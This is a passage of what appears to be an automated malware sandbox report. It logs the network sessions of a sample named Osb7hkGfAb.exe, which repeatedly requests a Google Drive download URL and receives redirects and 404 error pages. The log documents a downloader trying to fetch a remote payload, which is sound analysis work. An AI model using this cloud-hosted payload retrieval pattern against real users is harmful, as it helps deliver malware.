                                                                Content-Security-Policy: script-src 'nonce-GUqHkR93St__dVAqsdPTHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 4a 46 79 55 43 38 6f 35 2d 4a 6a 50 68 43 75 38 52 4d 72 5f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UJFyUC8o5-JjPhCu8RMr_g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.949719142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:08 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:08 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:08 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-vQt8E9r9d9ZGCyqCcwKNdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.949720216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:09 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:09 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQqrI4IVWBzUsNQSvKtxRIzBckrnSsKn8Csvr3rPIoUeivs7ZRs3nA6G9QyEvpYC61_
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:09 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-36pnhRGuC8USUQf-rt4aIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 31 57 4a 79 6f 37 58 56 30 6e 4d 2d 62 6e 62 6a 41 4d 41 37 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k1WJyo7XV0nM-bnbjAMA7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.949721142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:10 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:10 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:10 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-5iI00T3CiolcCTiqCsHW5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.949722216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:11 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:11 UTC1843INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRgZ3RkjCrev2TC2HEZqX0X_FWf6FSrblBlaJX1kZc9eJN-dePm_7mM8rXdIrICzJo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:11 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-KKXYcqXbDpC2lPjPfgcleg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 77 56 34 79 5a 57 37 74 45 34 73 55 5a 2d 4f 6e 4e 32 41 76 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SwV4yZW7tE4sUZ-OnN2Avg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.949723142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:12 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:13 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:12 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cT8452utFY_3jQULAtoutw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.949724216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:13 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:14 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRS1TvkPj5_KTp9_ekNxZGBr9ceCpw_vFb4MkfVElYg7yIUMj5qkMP_ZowhSgOMW2wL
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:14 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-vtonzqy3wwwa2PjxkLvEAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 7a 6d 43 5a 75 47 6b 2d 44 34 79 56 79 51 62 42 45 6a 70 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pzmCZuGk-D4yVyQbBEjpiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.949725142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:15 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:15 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:15 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ovvm97GCBj6V-K7uHLKwyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
